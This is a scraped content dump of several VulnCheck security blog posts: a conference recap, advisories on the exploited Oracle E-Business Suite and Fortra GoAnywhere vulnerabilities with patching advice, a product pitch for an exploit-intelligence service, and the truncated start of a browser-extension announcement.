we grow it and start planning for our 2026 conference.",[18,33090,33091],{},"Also, Marketbridge, VulnCheck’s PR firm of record, was immensely helpful in putting this event on the map, working with reporters ahead of the event and onsite too, to ensure the media had the level of access to the content and presenters necessary.",[18,33093,33094],{},[68,33095],{"alt":33096,"src":33097,"width":28205},"Panel Talk From THREATCON1","\u002Fblog\u002F2025-threatcon1-recap\u002FIMG_3036.jpg",[61,33099,33101],{"id":33100},"our-podcast","Our Podcast",[18,33103,33104,33105,1246,33110,1246,33115,1246,33120,982,33125,33130],{},"My good friend Patrick Garrity and I kicked off our THREATCON1 podcast the week prior to the event to help show the world what they could expect from our conference. THREATCON1 is available on ",[47,33106,33109],{"href":33107,"rel":33108},"https:\u002F\u002Fpodcasts.apple.com\u002Fus\u002Fpodcast\u002Fthreatcon1\u002Fid1840497653",[51],"Apple",[47,33111,33114],{"href":33112,"rel":33113},"https:\u002F\u002Fopen.spotify.com\u002Fshow\u002F7exxOX3rmj0Ic1zhtsIkBu",[51],"Spotify",[47,33116,33119],{"href":33117,"rel":33118},"https:\u002F\u002Fmusic.amazon.com\u002Fpodcasts\u002F76b9bdf2-0cad-4ee5-b0c9-b96984a0e15f",[51],"Amazon",[47,33121,33124],{"href":33122,"rel":33123},"https:\u002F\u002Fwww.iheart.com\u002Fpodcast\u002F269-threatcon1-295026477\u002F",[51],"iHeartRadio",[47,33126,33129],{"href":33127,"rel":33128},"https:\u002F\u002Fwww.youtube.com\u002Fplaylist?list=PLxJm4O47cW3WFm5zGvyuDABivD91rveIR",[51],"YouTube",". We kicked off with episodes one and two featuring Jen Easterly and Andy Boyd respectively.",[18,33132,33133],{},"But this isn’t just limited to conference-related content - - this will be a large part of VulnCheck bringing on interesting, important and unique voices from the cyber industry all focused on the emerging cyber threat landscape. Look for our next set of episodes that’ll drop in the coming weeks.",[61,33135,33137],{"id":33136},"other-cool-stuff-we-did","Other Cool Stuff We Did",[18,33139,33140],{},"As part of the experience, we put together our first THREATCON1 golf tournament at Reston National Golf Club the day prior to our conference. Needless to say it was a blast. From first-timers to experienced golfers, we filled the course with people to activate networking and partnering opportunities. My foursome finished third in prize money netting a whopping $40.08. We’re all $10.02 richer today as a result!",[18,33142,33143],{},"And we ran a Capture the Flag challenge that yielded far more participants than we could have expected, hosted by our Initial Access research and product team. It was a mix of trivia, PCAP analysis, reverse engineering, and exploitation tasks that were rewarded for their efforts. In fact it was so successful that we’re planning some new exercises to roll out more broadly - stay tuned for more cool stuff from us!",[61,33145,33147],{"id":33146},"thats-a-wrap","That’s a Wrap",[18,33149,33150],{},"We hope to continuously engage our audience by making all the aspects of THREATCON1 unique, interesting and fun. If you missed it, we sincerely hope you’ll get involved for our 2026 event.",[18,33152,33153],{},"What I learned along the way with THREATCON1 is if you can dream it and apply stringent execution to make it happen, anything is possible. Even just taking the time out of your average day in the industry to connect with friends, colleagues and leaders was so worth the time. Like even just making new friends in the industry and welcoming new VulnCheckers to the THREATCON1 experience was one of the most rewarding things I’ve done in my career.",[18,33155,33156],{},"We’ll have a Call for Papers going live in January, and again thank you to EVERYONE for making THREATCON1 a success!",{"title":219,"searchDepth":220,"depth":220,"links":33158},[33159,33160,33161,33162,33163,33164],{"id":33049,"depth":220,"text":33050},{"id":33065,"depth":220,"text":33066},{"id":33081,"depth":220,"text":33082},{"id":33100,"depth":220,"text":33101},{"id":33136,"depth":220,"text":33137},{"id":33146,"depth":220,"text":33147},"2025-10-06","VulnCheck's inaugural THREATCON1 event brought together hundreds of cybersecurity professionals for a groundbreaking conference focused on emerging threats and innovative solutions.",{"slug":33168},"2025-threatcon1-recap","\u002Fblog\u002F2025-threatcon1-recap",{"title":33021,"description":33166},"blog\u002F2025-threatcon1-recap",[33173],"community","99WMnRbqJZ2AwdVCwtMFpVOn0tjtf3B_QmOH-9VE4HA",{"id":33176,"title":33177,"articles":7,"authors":33178,"body":33180,"date":33165,"description":33319,"extension":234,"image":7,"link":7,"meta":33320,"navigation":237,"path":33321,"seo":33322,"series":7,"stem":33323,"subtype":7,"tags":33324,"__hash__":33325},"blog\u002Fblog\u002Foracle-e-business-suite-cve-2025-61882-exploited-in-extortion-attacks.md","Oracle E-Business Suite CVE-2025-61882 Exploited in Extortion Attacks",[33179],{"name":256,"link":258,"avatar":257,"linkName":219},{"type":15,"value":33181,"toc":33312},[33182,33185,33199,33201,33210,33219,33228,33237,33241,33244,33247,33257,33261,33269,33272,33274,33291,33294,33297,33299],[18,33183,33184],{},"Cl0p, a prolific ransomware and extortion threat group, confirmed that they were behind a large-scale extortion campaign targeting Oracle E-Business Suite (EBS) customers that appears to have begun September 29.",[22,33186,33187,33190,33193,33196],{},[25,33188,33189],{},"Oracle initially made a statement indicating that one or more vulnerabilities patched in July 2025 were potentially exploited; they later published CVE-2025-61882, a net-new zero-day vulnerability linked to the attack.",[25,33191,33192],{},"A rival threat group posted what they said was the exploit Cl0p had used to gain access to Oracle EBS data. VulnCheck and others have confirmed this exploit is legitimate.",[25,33194,33195],{},"Signatures, ASM queries, and a PCAP for CVE-2025-61882 are available to VulnCheck initial access intelligence customers. CVE-2025-61882 has been added to VulnCheck KEV.",[25,33197,33198],{},"On Saturday, October 11, Oracle disclosed CVE-2025-61884, a second vulnerability in E-Business Suite.",[61,33200,11273],{"id":11272},[18,33202,33203,33204,33209],{},"On September 29, 2025, multiple organizations began receiving extortion emails purporting to be from the Cl0p ransomware and extortion group. The emails, which were aimed at Oracle E-Business Suite (EBS) customers, claimed that Cl0p had \"recently breached your Oracle E-Business Suite application and copied a lot of documents.\" While threat intel practitioners were initially uncertain whether the extortion emails were coming from Cl0p vs. from an impersonator, Cl0p ",[47,33205,33208],{"href":33206,"rel":33207},"https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Fclop-extortion-emails-claim-theft-of-oracle-e-business-suite-data\u002F",[51],"confirmed"," to Bleeping Computer on October 1 that they were involved in the campaign.",[18,33211,33212,33213,33218],{},"On October 2, Oracle released a brief statement noting that some Oracle EBS customers had received extortion emails, and that an ongoing investigation had \"found the potential use of previously identified vulnerabilities that are addressed in the July 2025 ",[47,33214,33217],{"href":33215,"rel":33216},"https:\u002F\u002Fwww.oracle.com\u002Fsecurity-alerts\u002Fcpujul2025.html",[51],"Critical Patch Update",".\"",[18,33220,33221,33222,33227],{},"A day later, however, on Friday, October 3, a rival threat group called ShinyHunters posted a profanity-laced tirade against Cl0p alongside what they claimed was the exploit Cl0p had used to gain access to Oracle EBS data. Late the evening of Saturday, October 4, Oracle ",[47,33223,33226],{"href":33224,"rel":33225},"https:\u002F\u002Fblogs.oracle.com\u002Fsecurity\u002Fpost\u002Fapply-july-2025-cpu",[51],"released a revised statement"," pointing to a net-new zero-day vulnerability discovered during their investigation. The ShinyHunters exploit is directly referenced in the IOCs Oracle released in the zero-day advisory.",[18,33229,33230,33231,33236],{},"The zero-day vulnerability, ",[47,33232,33235],{"href":33233,"rel":33234},"https:\u002F\u002Fwww.oracle.com\u002Fsecurity-alerts\u002Falert-cve-2025-61882.html",[51],"CVE-2025-61882🔗🔗",", resides in the BI Publisher Integration component of Oracle Concurrent Processing, which is part of Oracle EBS. No vulnerability root cause was specified in the advisory, but Oracle's guidance does say the vulnerability is remotely exploitable without authentication and can result in remote code execution. CVE-2025-61882 carries a CVSS score of 9.8. Combined with IOCs pointing to the ShinyHunters exploit, the revised Oracle statement appears to confirm that CVE-2025-61882 was used in the Cl0p-attributed campaign.",[61,33238,33240],{"id":33239},"cve-2025-61882-exploit-observations","CVE-2025-61882 Exploit Observations",[18,33242,33243],{},"It's currently unknown whether other threat groups have already deployed the exploit for their own ends, but defenders should note that anyone who was following the ShinyHunters saga already has direct access to the full exploit. In other words, broader exploitation is likely if not inevitable.",[18,33245,33246],{},"As of October 6, FOFA showed a little more than 5,000 Oracle EBS login pages exposed to the public internet; Censys shows roughly half that.",[18,33248,33249,33250,33253,33254,59],{},"VulnCheck's research team has tested the exploit against a vulnerable version of Oracle EBS and was able to reproduce the attack and confirm the IOCs match those in Oracle's advisory on CVE-2025-61882. ",[295,33251,33252],{},"Network signatures, ASM queries, and a PCAP for this vulnerability are available to VulnCheck Initial Access Intelligence customers."," CVE-2025-61882 has also been added to ",[47,33255,1233],{"href":10806,"rel":33256},[51],[61,33258,33260],{"id":33259},"cve-2025-61884-second-vulnerability-disclosed","CVE-2025-61884: Second Vulnerability Disclosed",[18,33262,33263,33264,33268],{},"On Saturday, October 11, Oracle published an ",[47,33265,5359],{"href":33266,"rel":33267},"https:\u002F\u002Fwww.oracle.com\u002Fsecurity-alerts\u002Falert-cve-2025-61884.html",[51]," for CVE-2025-61884, a high-severity vulnerability in the Runtime UI component of E-Business Suite's Oracle Configurator product. Per the advisory, the vulnerability is remotely exploitable without authentication. Successful exploitation \"may allow access to sensitive resources.\"",[18,33270,33271],{},"No CWE (root cause) is provided, the advisory doesn't explain which \"sensitive resources\" may be affected, and Oracle doesn't specify one way or another whether CVE-2025-61884 has been exploited or is related to CVE-2025-61882. The CVSS v4 vector for CVE-2025-61884 notes that the vulnerability only impacts confidentiality (not integrity or availability).",[61,33273,1782],{"id":1781},[18,33275,33276,33277,33280,33281,33286,33287,59],{},"CVE-2025-61882 affects supported versions 12.2.3 - 12.2.14 of Oracle E-Business Suite. Unsupported versions may also be vulnerable. Oracle EBS customers should ",[295,33278,33279],{},"immediately"," apply the vendor-supplied ",[47,33282,33285],{"href":33283,"rel":33284},"https:\u002F\u002Fsupport.oracle.com\u002Frs?type=doc&id=3106344.1",[51],"patch"," and hunt for the presence of any IOCs in the ",[47,33288,33290],{"href":33233,"rel":33289},[51],"Oracle advisory",[18,33292,33293],{},"Patch availability information for CVE-2025-61884 is behind customer login, but since it's unclear whether the flaw has been exploited, defenders may want to assume that vulnerability should also be patched on an emergency basis.",[18,33295,33296],{},"As always, patching alone does not eradicate prior compromise.",[61,33298,202],{"id":201},[18,33300,33301,33302,1246,33306,1255,33309,59],{},"The VulnCheck research team is always on the lookout for new vulnerabilities to analyze and exploit. For more research like this, see ",[47,33303,33305],{"href":32682,"rel":33304},[51],"CVE-2025-10035: Critical Vulnerability in Fortra GoAnywhere MFT",[47,33307,32017],{"href":32015,"rel":33308},[51],[47,33310,31540],{"href":31538,"rel":33311},[51],{"title":219,"searchDepth":220,"depth":220,"links":33313},[33314,33315,33316,33317,33318],{"id":11272,"depth":220,"text":11273},{"id":33239,"depth":220,"text":33240},{"id":33259,"depth":220,"text":33260},{"id":1781,"depth":220,"text":1782},{"id":201,"depth":220,"text":202},"A new Oracle E-Business Suite zero-day vulnerability is being linked to a Cl0p extortion campaign that exfiltrated EBS data from Oracle customer environments",{},"\u002Fblog\u002Foracle-e-business-suite-cve-2025-61882-exploited-in-extortion-attacks",{"title":33177,"description":33319},"blog\u002Foracle-e-business-suite-cve-2025-61882-exploited-in-extortion-attacks",[242,1281],"n121kNFUbMUkE0EFmaMZnF-A3XHhyBOYAu5C9-yLFP4",{"id":33327,"title":33305,"articles":33328,"authors":33355,"body":33357,"date":33332,"description":33528,"extension":234,"image":7,"link":7,"meta":33529,"navigation":237,"path":33530,"seo":33531,"series":7,"stem":33532,"subtype":7,"tags":33533,"__hash__":33534},"blog\u002Fblog\u002Fcve-2025-10035-fortra-go-anywhere-mft.md",[33329,33333,33336,33340,33343,33347,33351],{"title":33330,"source":11228,"link":33331,"date":33332},"Researchers raise alarm over maximum-severity defect in GoAnywhere file-transfer service","https:\u002F\u002Fcyberscoop.com\u002Fgoanywhere-file-transfer-service-vulnerability-september-2025\u002F","2025-09-19",{"title":33334,"source":3486,"link":33335,"date":33332},"Fortra patches critical GoAnywhere MFT flaw akin to past ransomware exploits","https:\u002F\u002Fwww.csoonline.com\u002Farticle\u002F4060276\u002Ffortra-patches-critical-goanywhere-mft-flaw-akin-to-past-ransomware-exploits.html",{"title":33337,"source":3495,"link":33338,"date":33339},"Risky Bulletin: Cyberattack disrupts airports across Europe","https:\u002F\u002Frisky.biz\u002Frisky-bulletin-cyberattack-disrupts-airports-across-europe\u002F","2025-09-22",{"title":33341,"source":25048,"link":33342,"date":33339},"Security analysts alarmed over latest GoAnywhere MFT vulnerability","https:\u002F\u002Fwww.cyberdaily.au\u002Fsecurity\u002F12664-security-analysts-alarmed-over-latest-goanywhere-mft-vulnerability",{"title":33344,"source":33345,"link":33346,"date":33339},"Unpatched Fortra GoAnywhere instances at risk of full takeover (CVE-2025-10035)","HelpNetSecurity","https:\u002F\u002Fwww.helpnetsecurity.com\u002F2025\u002F09\u002F22\u002Ffortra-goanywhere-vulnerability-cve-2025-10035\u002F",{"title":33348,"source":11228,"link":33349,"date":33350},"Worries mount over max-severity GoAnywhere defect","https:\u002F\u002Fcyberscoop.com\u002Fgoanywhere-vulnerability-active-exploitation-september-2025\u002F","2025-09-26",{"title":33352,"source":11228,"link":33353,"date":33354},"Fortra cops to exploitation of GoAnywhere file-transfer service defect","https:\u002F\u002Fcyberscoop.com\u002Ffortra-goanywhere-vulnerability-exploitation\u002F","2025-10-13",[33356],{"name":256,"link":258,"avatar":257},{"type":15,"value":33358,"toc":33522},[33359,33370,33382,33385,33388,33418,33423,33427,33450,33454,33467,33469,33476,33479,33482,33485,33487,33505],[22,33360,33361,33364,33367],{},[25,33362,33363],{},"Cybersecurity company Fortra disclosed a new critical vulnerability in GoAnywhere MFT",[25,33365,33366],{},"It's unclear whether the vulnerability has been exploited in the wild, but past GoAnywhere MFT vulnerabilities have been targeted by ransomware and other threat actors (note: we later discovered the vulnerability was exploited as a zero-day)",[25,33368,33369],{},"Fixed versions are available and customers should restrict access to the admin console",[18,33371,33372,33373,33377,33378,33381],{},"Late on Thursday, September 18, cybersecurity firm Fortra ",[47,33374,22232],{"href":33375,"rel":33376},"https:\u002F\u002Fwww.fortra.com\u002Fsecurity\u002Fadvisories\u002Fproduct-security\u002Ffi-2025-012",[51]," an advisory for ",[47,33379,32635],{"href":32633,"rel":33380},[51],", a critical vulnerability in their GoAnywhere MFT solution. The vulnerability ultimately arises from a deserialization flaw in GoAnywhere MFT's license servlet, allowing remote attackers with “a validly forged license response signature to deserialize an arbitrary actor-controlled object, possibly leading to command injection.” The vulnerability carries a CVSSv3 score of 10.",[18,33383,33384],{},"Fortra's advisory doesn't specify whether the issue has been exploited in the wild.",[18,33386,33387],{},"GoAnywhere MFT is a managed file transfer product that stores a wealth of sensitive data and is a crown jewel-type target particularly for ransomware and extortion groups. The vendor advisory lists the discovery date for CVE-2025-10035 as September 13, meaning the turnaround time from discovery to patch release was nominally only five days — an appropriately urgent (but still impressive) fix timeline for a product that has previously been exploited by ransomware and other groups:",[22,33389,33390,33404],{},[25,33391,33392,33397,33398,33403],{},[47,33393,33396],{"href":33394,"rel":33395},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2023-0669",[51],"CVE-2023-0669",", another deserialization vulnerability that led to command injection, was disclosed as a zero-day in early 2023 after being exploited by the Cl0p ransomware and extortion group in a hack that ",[47,33399,33402],{"href":33400,"rel":33401},"https:\u002F\u002Ftechcrunch.com\u002F2023\u002F03\u002F22\u002Ffortra-goanywhere-ransomware-attack\u002F",[51],"affected"," 100+ organizations; to date, the flaw is known to have been leveraged by at least five different ransomware groups.",[25,33405,33406,33411,33412,33417],{},[47,33407,33410],{"href":33408,"rel":33409},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2024-0204",[51],"CVE-2024-0204",", a critical authentication bypass, was disclosed in early 2024 and ",[47,33413,33416],{"href":33414,"rel":33415},"https:\u002F\u002Fwww.cybersecuritydive.com\u002Fnews\u002Ffortra-goanywhere-critical-cve\u002F705476\u002F",[51],"allowed"," adversaries to access the admin panel and add unauthorized admin users. CVE-2024-0204 isn't known to have been exploited en masse, but has had multiple weaponized public exploits available since January 2024; Shadowserver is still detecting ongoing exploitation attempts for this issue as of September 2025.",[18,33419,33420],{},[295,33421,33422],{},"Notably, the vulnerability description and root cause of CVE-2025-10035 are virtually identical to the description of CVE-2023-0669.",[61,33424,33426],{"id":33425},"exploitation-in-the-wild-updates-october-2025","Exploitation in the Wild Updates: October 2025",[18,33428,33429,33430,33434,33435,33440,33441,33445,33446,33449],{},"Since VulnCheck originally published this blog post, multiple sources have reported that CVE-2025-10035 was exploited in the wild as a zero-day. On September 25, 2025 security firm watchTowr ",[47,33431,12291],{"href":33432,"rel":33433},"https:\u002F\u002Flabs.watchtowr.com\u002Fit-is-bad-exploitation-of-fortra-goanywhere-mft-cve-2025-10035-part-2\u002F",[51]," that evidence of exploitation had been reported to them privately and aligned directly with the stack traces laid out in Fortra's advisory. On September 29, the vulnerability was also ",[47,33436,33439],{"href":33437,"rel":33438},"https:\u002F\u002Fwww.cisa.gov\u002Fnews-events\u002Falerts\u002F2025\u002F09\u002F29\u002Fcisa-adds-five-known-exploited-vulnerabilities-catalog",[51],"added"," to CISA KEV. A week later, on October 6, Microsoft published ",[47,33442,33444],{"href":32687,"rel":33443},[51],"a blog"," detailing in-the-wild exploitation attributed to ",[47,33447,941],{"href":32645,"rel":33448},[51],", which in at least one incident resulted in Medusa ransomware deployment; the activity Microsoft observed began on September 11, a week before Fortra's public advisory on CVE-2025-10035.",[61,33451,33453],{"id":33452},"unanswered-questions","Unanswered Questions",[18,33455,33456,33457,982,33461,33466],{},"VulnCheck and at least two other research firms (",[47,33458,14823],{"href":33459,"rel":33460},"https:\u002F\u002Flabs.watchtowr.com\u002Fis-this-bad-this-feels-bad-goanywhere-cve-2025-10035\u002F",[51],[47,33462,33465],{"href":33463,"rel":33464},"https:\u002F\u002Fattackerkb.com\u002Ftopics\u002FLbA9ANjcdz\u002Fcve-2025-10035\u002Frapid7-analysis?referrer=vulncheck",[51],"Rapid7",") have analyzed CVE-2025-10035 and independently determined that exploitation requires a private key that is not generally known. Since CVE-2025-10035 has now been identified as a zero-day vulnerability, it's clear, however, that one or more adversaries DOES have access to this private key — it's not currently known how this came about. As of October 7, 2025, Fortra's advisory for the issue still does not specify that it has been exploited in the wild.",[61,33468,1782],{"id":1781},[18,33470,33471,33472,33475],{},"Fortra's ",[47,33473,5359],{"href":33375,"rel":33474},[51]," for CVE-2025-10035 doesn't specify affected versions, but advises GoAnywhere MFT customers to update to a patched version, namely 7.8.4 (latest) or 7.6.3 (“Sustain Release”). The vendor also notes that “exploitation of this vulnerability is highly dependent upon systems being externally exposed to the internet.”",[18,33477,33478],{},"Given GoAnywhere MFT's history of threat actor targeting, we'd advise making that update an immediate priority, along with ensuring the GoAnywhere MFT admin console isn't exposed to the public internet. In general, it's also advisable to implement egress filtering and alert on large file uploads, high-volume traffic to suspicious IPs or domains, and data transfer and archive utility usage.",[18,33480,33481],{},"As always, since we now know the vulnerability was exploited in the wild as a zero-day, patching alone will not eradicate adversaries from compromised systems.",[18,33483,33484],{},"PCAPs, Snort and Suricata rules, and a vulnerable Docker container for this vulnerability are available to VulnCheck Initial Access Intelligence customers. CVE-2025-10035 is also on VulnCheck KEV.",[61,33486,202],{"id":201},[18,33488,33489,33490,1246,33495,1255,33500,59],{},"The VulnCheck research team is always on the lookout for new vulnerabilities to analyze and abuse. For more research like this, see ",[1131,33491,33492],{},[47,33493,30358],{"href":30356,"rel":33494},[51],[1131,33496,33497],{},[47,33498,32017],{"href":32015,"rel":33499},[51],[1131,33501,33502],{},[47,33503,31540],{"href":31538,"rel":33504},[51],[18,33506,1228,33507,1234,33510,1240,33513,1246,33516,1255,33519,1260],{},[47,33508,1233],{"href":10806,"rel":33509},[51],[47,33511,1239],{"href":1237,"rel":33512},[51],[47,33514,1245],{"href":1243,"rel":33515},[51],[47,33517,1251],{"href":1249,"rel":33518},[51],[47,33520,216],{"href":1258,"rel":33521},[51],{"title":219,"searchDepth":220,"depth":220,"links":33523},[33524,33525,33526,33527],{"id":33425,"depth":220,"text":33426},{"id":33452,"depth":220,"text":33453},{"id":1781,"depth":220,"text":1782},{"id":201,"depth":220,"text":202},"A new critical vulnerability was disclosed in Fortra's GoAnywhere managed file transfer product, which has been targeted in the past by ransomware and extortion groups",{},"\u002Fblog\u002Fcve-2025-10035-fortra-go-anywhere-mft",{"title":33305,"description":33528},"blog\u002Fcve-2025-10035-fortra-go-anywhere-mft",[242,1281],"PI9rLeNbMSRYM0Lj7CeNUXSTIRuEiXVnIQaQFazyGUo",{"id":33536,"title":33537,"articles":7,"authors":33538,"body":33544,"date":33734,"description":33735,"extension":234,"image":7,"link":7,"meta":33736,"navigation":237,"path":33738,"seo":33739,"series":7,"stem":33740,"subtype":7,"tags":33741,"__hash__":33742},"blog\u002Fblog\u002Fvulncheck-initial-access.md","Getting Ahead of Exploitation with Initial Access Intelligence",[33539],{"name":33540,"avatar":33541,"link":33542,"linkName":33543},"Tim Roberts","https:\u002F\u002Fca.slack-edge.com\u002FT02P16KHNRY-U08T1TQ07RQ-a20bab79afb1-72","https:\u002F\u002Fwww.linkedin.com\u002Fin\u002Ftimroberts213\u002F","in\u002Ftimroberts213\u002F",{"type":15,"value":33545,"toc":33723},[33546,33552,33555,33558,33563,33567,33570,33573,33576,33590,33593,33597,33602,33605,33608,33612,33617,33620,33624,33627,33631,33634,33648,33652,33666,33670,33673,33699,33703,33706,33709,33712,33714,33716,33718],[18,33547,33548],{},[68,33549],{":width":10862,"alt":33550,"src":33551},"Intiial Access Exploits","\u002Fblog\u002Fvulncheck-initial-access\u002Finitial-access-overtime.png",[1920,33553,33537],{"id":33554},"getting-ahead-of-exploitation-with-initial-access-intelligence",[18,33556,33557],{},"In cybersecurity, timing is everything. Whether you're responding to threats, building detections, or preparing for red team exercises, knowing that a vulnerability is exploitable and having access to functional code can mean the difference between proactive defense and damage control.",[18,33559,33560,33562],{},[295,33561,21185],{}," delivers that edge. Built by a team of former government exploit developers and offensive security experts (including contributors to Metasploit), IAI delivers production-ready, validated exploits and detections for vulnerabilities most likely to be exploited for initial access and most likely to be added to CISA’s Known Exploited Vulnerabilities (KEV) catalog.",[61,33564,33566],{"id":33565},"why-public-poc-isnt-enough","Why Public PoC Isn’t Enough",[18,33568,33569],{},"Public proof-of-concept (PoC) code is often incomplete, unstable, straight-up fake, or requires significant modification before it's usable in real-world conditions. Even when a PoC is available, it can take days or weeks for a functional, weaponized version to emerge. Worse, some public PoCs contain obfuscated payloads or malicious code that can introduce risk during testing.",[18,33571,33572],{},"Security teams often spend valuable time sorting through unreliable or dangerous public exploits. That’s time that could be spent defending their environment.",[18,33574,33575],{},"Initial Access Intelligence (IAI) eliminates that uncertainty by providing:",[22,33577,33578,33581,33584,33587],{},[25,33579,33580],{},"Working exploit code with documented preconditions and execution steps",[25,33582,33583],{},"PCAPs, signatures, and detection rules for immediate SOC and SIEM integration",[25,33585,33586],{},"Reconnaissance queries (Shodan, Censys, FOFA) to map exposure",[25,33588,33589],{},"Validated intelligence built and tested in-house",[18,33591,33592],{},"No more reverse engineering tweets, cleaning up broken GitHub scripts, or risking a sandbox detonation just to verify a PoC. With IAI, you get safe, verified, ready-to-use tools from day one.",[61,33594,33596],{"id":33595},"vulncheck-exploit-availability-vs-cisa-kev","VulnCheck Exploit Availability vs. CISA KEV",[18,33598,33599],{},[68,33600],{":width":10862,"alt":33550,"src":33601},"\u002Fblog\u002Fvulncheck-initial-access\u002Finitial-access-cisa-kev.png",[18,33603,33604],{},"When examining VulnCheck’s Initial Access data and comparing the dates of availability with CISA KEV, we found that 32.1% of the time, VulnCheck’s exploit proof-of-concepts (POCs) and detection artifacts were available before the vulnerability was added to CISA KEV. 50% of the time, VulnCheck's exploit POCs were available within nine days of the vulnerability’s addition to CISA KEV.",[18,33606,33607],{},"Furthermore, there are 150 CVEs we’ve generated exploits and detection artifacts for that have not yet been included in CISA KEV but have confirmed evidence of exploitation. This underscores the value of VulnCheck’s early availability of exploits and detection artifacts.",[61,33609,33611],{"id":33610},"vulncheck-vendor-coverage","VulnCheck Vendor Coverage",[18,33613,33614],{},[68,33615],{":width":10862,"alt":33550,"src":33616},"\u002Fblog\u002Fvulncheck-initial-access\u002Finitial-access-vendors.png",[18,33618,33619],{},"When we take a look at our focus, the VulnCheck Initial Access team is focused on building exploits and detection artifacts for initial access. This chart highlights many of the common vendors and technologies that we’ve released initial access artifacts including network edge devices, open source software, server products, content management systems, file sharing platforms, ICS\u002FOT devices and more.",[61,33621,33623],{"id":33622},"our-curation-picks-the-right-targets","Our Curation Picks the Right Targets",[18,33625,33626],{},"87.2% of IAI CVEs eventually had public exploits developed - proof that VulnCheck's prioritization focuses on what truly matters.",[61,33628,33630],{"id":33629},"the-timing-advantage","The Timing Advantage",[18,33632,33633],{},"IAI isn't just early, it’s strategic. Here’s how the 383 CVEs in our dataset break down:",[22,33635,33636,33639,33642,33645],{},[25,33637,33638],{},"8.4%: No public PoC available at the time of IAI delivery",[25,33640,33641],{},"42.0%: IAI delivered after a public PoC, but before any known public weaponized tooling (e.g., Metasploit)",[25,33643,33644],{},"15.1%: IAI delivered before or at the same time as the public PoC",[25,33646,33647],{},"34.5%: IAI delivered after public sources, but included validated exploits, detections, and artifacts",[61,33649,33651],{"id":33650},"real-world-success-stories","Real-World Success Stories",[22,33653,33654,33657,33660,33663],{},[25,33655,33656],{},"CVE-2025-23006: A Sonicwall SMA1000 vulnerability confirmed exploited by CISA KEV with VulnCheck as the only Exploit source.",[25,33658,33659],{},"CVE-2024-40891 and CVE-2024-40890: Zyxel Gateway DSL Modem vulnerabilities confirmed as exploited by CISA 214 Days after VulnCheck exploit and detection artifact availability.",[25,33661,33662],{},"CVE-2023-27855: A Rockwell Automation ThinManager ThinServer vulnerability, delivered 765 days before public weaponization",[25,33664,33665],{},"CVE-2024-4885: A Progress WhatsUp Gold vulnerability added to CISA KEV 234 Days after VulnCheck exploit and detection artifact availability.",[61,33667,33669],{"id":33668},"built-for-action","Built for Action",[18,33671,33672],{},"IAI doesn’t just get you ahead of exploitation in the wild, it’s more practical:",[22,33674,33675,33681,33687,33693],{},[25,33676,33677,33680],{},[295,33678,33679],{},"Blue Teams",": Customize and test detections, harden systems, and simulate exploitation preemptively",[25,33682,33683,33686],{},[295,33684,33685],{},"Red Teams",": Launch real-world attacks without waiting for public code",[25,33688,33689,33692],{},[295,33690,33691],{},"Vulnerability Management",": Prioritize patching based on active exploitability",[25,33694,33695,33698],{},[295,33696,33697],{},"Security Leadership",": Reduce exposure before CVEs become KEV-listed or broadly exploited",[61,33700,33702],{"id":33701},"strategic-takeaways","Strategic Takeaways",[18,33704,33705],{},"While your team is waiting for public PoCs, attackers may already be exploiting\nWhile competitors are analyzing disclosures, your defenses are already in place\nWhile others react to KEV updates, you’ve already patched or blocked exposure\nConclusion\nVulnCheck’s Initial Access dataset doesn’t just provide early access, it provides months of early access to production-ready exploits for vulnerabilities that frequently become exploited in the wild.",[18,33707,33708],{},"In cybersecurity, being reactive is expensive. IAI gives you a sustainable head start.",[18,33710,33711],{},"Want to see how VulnCheck's Initial Access dataset can give your team a competitive edge? Contact us to learn more.",[61,33713,202],{"id":201},[18,33715,205],{},[18,33717,208],{},[18,33719,211,33720,217],{},[47,33721,216],{"href":214,"rel":33722},[51],{"title":219,"searchDepth":220,"depth":220,"links":33724},[33725,33726,33727,33728,33729,33730,33731,33732,33733],{"id":33565,"depth":220,"text":33566},{"id":33595,"depth":220,"text":33596},{"id":33610,"depth":220,"text":33611},{"id":33622,"depth":220,"text":33623},{"id":33629,"depth":220,"text":33630},{"id":33650,"depth":220,"text":33651},{"id":33668,"depth":220,"text":33669},{"id":33701,"depth":220,"text":33702},{"id":201,"depth":220,"text":202},"2025-09-11","IAI delivers production-ready, validated exploits and detections for vulnerabilities most likely to be exploited for initial access and most likely to be added to CISA’s Known Exploited Vulnerabilities (KEV) catalog.",{"slug":33737},"vulncheck-initial-access","\u002Fblog\u002Fvulncheck-initial-access",{"title":33537,"description":33735},"blog\u002Fvulncheck-initial-access",[1281,1279],"1WI9RqNnYMPhmqn0F44qVhssxSeSSxm4ElJ_c8_1j1Q",{"id":33744,"title":3355,"articles":33745,"authors":33746,"body":33748,"date":33967,"description":3356,"extension":234,"image":7,"link":7,"meta":33968,"navigation":237,"path":33969,"seo":33970,"series":7,"stem":33971,"subtype":7,"tags":33972,"__hash__":33974},"blog\u002Fblog\u002Fvulncheck-insights-chrome-extension.md",[],[33747],{"name":3256,"avatar":3257,"link":3258,"linkName":3259},{"type":15,"value":33749,"toc":33960},[33750,33759,33761,33765,33771,33774,33777,33780,33794,33801,33804,33810,33813,33820,33826,33829,33840,33846,33849,33863,33866,33872,33878,33881,33884,33887,33893,33899,33906,33913,33916,33921,33927,33930,33933,33935,33937,33939,33958],[47,33751,33754],{"href":33752,"target":33753},"https:\u002F\u002Fhubs.la\u002FQ03Hq45j0","blank",[33755,33756],"prose-img",{":zoom":5971,"alt":33757,"src":33758},"VulnCheck Insights on Chrome Store","\u002Fblog\u002Fvulncheck-insights-chrome-extension\u002Fchrome-store.png",[1823,33760],{},[263,33762],{":list":33763,"ico":33764,"title":20},"[\"VulnCheck is launching its new VulnCheck Insights capability for all Community and Commercial customers. The extension is now available on the Google Chrome Store.\",\"VulnCheck Insights is a Chrome extension that enables teams to immediately access critical CVE intelligence with just a hover prior to drill-down into the specific CVE or group of CVEs.\",\"VulnCheck Insights is the first browser extension to deliver exploit intelligence that consistently beats NVD and CISA KEV, giving defenders the earliest actionable context.\",\"View a walkthrough of installation and how to use the extension on our YouTube Channel.\"]","i-mdi-check-bold",[18,33766,33767],{},[68,33768],{"alt":33769,"src":33770},"chrome store","\u002Fblog\u002Fvulncheck-insights-chrome-extension\u002Fscreenshot-1.png",[18,33772,33773],{},"Introducing “VulnCheck Insights”, the in-your-browser version of VulnCheck’s exploit intelligence. Instead of bouncing between tabs, you now get instant, current context the moment 